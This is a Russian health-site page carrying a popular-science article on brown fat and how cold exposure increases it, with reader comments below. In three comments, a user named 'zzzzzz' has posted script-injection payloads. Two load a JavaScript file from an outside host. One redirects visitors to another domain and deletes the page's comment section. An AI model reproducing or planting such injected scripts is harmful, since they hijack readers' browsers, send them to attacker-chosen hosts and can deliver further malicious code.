Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Жир, который поможет вам ...  >>  Жир, который поможет вам избавиться от жира!
 
Обратная связь
 

Жир, который поможет вам избавиться от жира!

Размер шрифта
09 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Избавиться от излишков жира – вот цель многих людей, которые хотят улучшить свой внешний вид и состояние здоровья. Однако не весь жир одинаков: существует так называемый коричневый жир, который может помочь вам сбросить вес.

Так что же представляет собой коричневый жир?

Это такой тип жира, который способен образовывать тепло. Благодаря тому, что в его клетках очень много митохондрий (органелл, которые отвечают за выработку энергии), жир приобретает красно-коричневый цвет. Он способен ускорять обмен веществ и помогать нашему организму сжигать лишние калории.

«У каждого из нас при рождении есть бурый жир. У детей его очень много. Он помогает им поддерживать температуру тела», – рассказывает Филипп Шерер, профессор клеточной биологии из Юго-западного медицинского центра в Далласе. «Однако с возрастом количество бурого жира уменьшается. Почему? Ученым пока не удалось до конца разобраться в этом вопросе», – добавляет Шерер.

Бурый жир может содержаться в организме взрослого человека в небольшом количестве. Однако все больше исследований говорят о том, что у некоторых взрослых количество бурого жира значительно выше, чем ожидалось. Чаще всего этот жир располагается среди белого (обычного) жира в области шеи, верхней части груди и плеч.

Чем этот жир отличается от белого жира? Коричневый жир сжигает высококалорийные жиры, которые называются липиды. Белый жир – это «плохой жир», который накапливает липиды и создает слой жира на животе и других частях тела, что вовсе не идет на пользу организму.

Как можно набрать «полезный» бурый жир? Снизьте температуру в доме на несколько градусов или же больше гуляйте в холодную погоду. Недавнее исследование показало, что длительное пребывание на холоде ускоряет рост количества бурого жира, в то время как тепло может его замедлить. В этой работе приняли участие мужчины в возрасте от 19 до 23 лет, за которыми велось наблюдение в течение 4 месяцев, во время которых ученые контролировали температуру в их спальнях. Результаты показали, что при 19ºC количество бурого жира возрастало, а также возрастала его способность сжигать калории. В тепле, при температуре 26,5ºC, количество бурого жира уменьшалось. Ученые выяснили, что на холоде организм образует новые клетки бурого жира, то есть превращения белого жира в бурый не происходит. Также на холоде нервные клетки, расположенные в буром жире, выделяют определенные вещества, которые увеличивают скорость сжигания калорий, что может способствовать снижению веса.

«Исследования говорят о том, что в последние несколько десятков лет температура воздуха в домах в среднем стала выше», – рассказывает доктор Пол Ли. Он считает, что подобное изменение температуры может быть одной из причин широкой распространенности ожирения в наше время. Разумеется, не стоит забывать и о неправильном питании и недостатке физической активности.

Может ли бурый жир помочь избавиться от лишнего веса? Количество калорий, которое можно сжечь благодаря активации бурого жира, до сих пор остается предметом споров. «При самом оптимистичном прогнозе бурый жир поможет вам сжечь 300-400 лишних калорий в день», – рассказывает Шерер. «Это существенное количество, но вы не сможете похудеть только благодаря работе бурого жира. А вот в комбинации с правильным питанием и изменением образа жизни, действие бурого жира может ускорить процесс похудения».

Что еще может делать бурый жир, помимо избавления от лишнего веса? Исследования показали, что он может снижать уровень сахара в крови. Это было установлено в экспериментах на крысах, однако ученые считают, что бурый жир оказывает подобное действие и в организме человека.

Так что вполне возможно, что изучение бурого жира, а также поиск способов увеличения его количества, в скором времени приведет к разработке новых методик лечения и лекарственных препаратов, которые будут использоваться в борьбе с лишним весом, ожирением и диабетом.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

09 июня 2015 в 22:37

Комментарий удален за нарушение Правил общения

2 - Гость

12 июня 2015 в 19:22

Цитировать   |   Пожаловаться

Очень  бы хотелось верить, но увы!  Всю жизнь живу на  Крайнем севере, в спальне у меня  зимой бывает и 14 градусов, но лишний вес только нарастает.

3 - zzzzzz

30 июня 2015 в 18:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:05

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как контролировать количество жира в теле   5 неожиданных причин, почему вы толстеете   Не выспались? Вы потолстеете!   Как уменьшить жир на лице?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции!
 

Слайдшоу

1
Как не сорваться на диете и похудеть?
Как не переедать
Сладкие искусители, которые не дают вам похудеть

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.